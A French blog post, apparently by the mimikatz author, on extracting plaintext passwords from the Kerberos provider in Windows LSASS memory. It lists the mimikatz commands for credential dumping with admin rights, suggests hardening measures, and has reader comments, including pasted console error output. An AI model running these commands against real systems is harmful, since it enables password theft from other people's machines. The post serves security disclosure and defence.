Re – re – re – pass the pass (word)

Publié le par

homer
Certains tendent le bâton… :(

Fournir aisément à autrui, par ses dires ou son comportement, l’occasion, la raison ou le simple prétexte de se faire blâmer, condamner ou punir.

Après le dernier billet sur « re – re – pass the pass » et…

  • l’absence de réaction (oui, cela a été rapide :)
  • une bonne question

… voici la suite !

Le provider

Cette fois ci nous avons le provider Kerberos ! Son fonctionnement par ticket n’impose normalement pas la réutilisation des mot de passe en clair.
Cf. une explication rapide de Microsoft : http://technet.microsoft.com/en-us/library/bb742516.aspx
kerberos par MS

Ce qui est dommage, c’est qu’une fois de plus des mots de passe sont encore conservés dans la mémoire du processus LSASS (en particulier à partir de NT 6).
mimikatz_vs_kerberos

Téléchargement et fonctionnement

Une mise à jour de mimikatz existe, mais elle n’est toujours pas disponible en téléchargement… (merci à nos amis éditeurs antivirus et Microsoft qui choisis de blacklister plutôt que d’améliorer ses processus)
Plus de release avant fin mai

A exécuter après avoir obtenu des droits administrateurs (ou system) :

privilege::debug
inject::service samss sekurlsa.dll
@getLogonPasswords full

La commande privilege::debug n’est pas obligatoire si vous êtes déjà system.
(plus d’information : http://blog.gentilkiwi.com/mimikatz/librairies/sekurlsa#getLogonPasswords et http://blog.gentilkiwi.com/mimikatz/librairies/sekurlsa/kerberos)

Nouvelles commandes (si besoin de séparation) :

@getMSV
@getTsPkg
@getWDigest
@getLiveSSP
@getKerberos

@getLogonPasswords utilise les providers disponibles et connus par mimikatz.

Améliorations

  • ne garder que kerberos, msv1_0 et schannel dans la liste des providers autorisés (se référer au billet d’origine sur « pass the pass »)
    Utiliser Kerberos uniquement avec des Tokens et Cartes à puce (sans délégation)
    ils sont essentiels au fonctionnement des services Windows
  • demander à Microsoft la validité de ce mode de fonctionnement avec un minimum de provider (je n’y crois vraiment plus…)

5 réflexions sur « Re – re – re – pass the pass (word) »

  1. Hi Gentil Kiwi! :-)
    Please explain why I have the error on Windows Server 2008?
    Thanks,
    Oscar.

    C:\Windows\system32>c:\m\win32\mimikatz
mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Jan 23 2013 00:13:21) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privil├иge : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full
mod_process::getVeryBasicModulesListForProcess : (0x0000012b) ╨Ч╨░╨┐╤А╨╛╤Б ReadProcessMemory ╨╕╨╗╨╕ WriteProcessMemory ╨▒╤Л╨╗ ╨▓╤Л╨┐╨╛╨╗╨╜╨╡╨╜ ╤В╨╛╨╗╤М╨║╨╛ ╤З╨░╤Б╤В╨╕╤З╨╜╨╛.
Donn├йes LSASS en erreur

mimikatz #
    Répondre

  2. Peut-on forcer Windows à vider cette cache lorsque l’usager ferme sa session? Bien que ça n’élimine pas totalement le risque, ça réduit le facteur temps.

    Répondre

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.